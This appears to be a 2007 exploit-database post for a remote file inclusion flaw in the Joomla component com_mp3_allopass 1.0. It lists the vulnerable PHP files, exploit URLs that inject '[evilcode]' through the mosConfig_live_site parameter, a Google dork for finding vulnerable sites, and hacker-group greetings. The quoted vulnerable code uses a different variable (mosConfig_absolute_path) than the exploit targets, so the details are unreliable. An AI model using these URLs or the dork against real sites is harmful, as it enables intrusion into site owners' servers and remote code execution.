Joomla Component MP3 Allopass 1.0 Remote File Inclusion Vulnerability

2007-10-10T00:00:00
ID 1337DAY-ID-2210
Type zdt
Reporter NoGe
Modified 2007-10-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
Joomla Component MP3 Allopass 1.0 Remote File Inclusion Vulnerability
=====================================================================



# com_mp3_allopass joomla component Remote File Include Vulnerability

   Component       : com_mp3_allopass
   Download file   : http://www.joomlaratings.com
   Dicovered by    : NoGe

==================================================================================================================================

# Vulnerable file

   /components/com_mp3_allopass/allopass.php

   line 3 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");

   /components/com_mp3_allopass/allopass-error.php

   line 2 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");

# Exploit

   http://localhost/path/components/com_mp3_allopass/allopass.php?mosConfig_live_site=[evilcode]
   http://localhost/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=[evilcode]

# google dork

   inurl:com_mp3_allopass

==================================================================================================================================

# Greetz

   all member #papuahacker #nyubicrew #baliemhackerlink
   skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
   yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq

================================================================================================================================== 



#  0day.today [2018-02-09]  #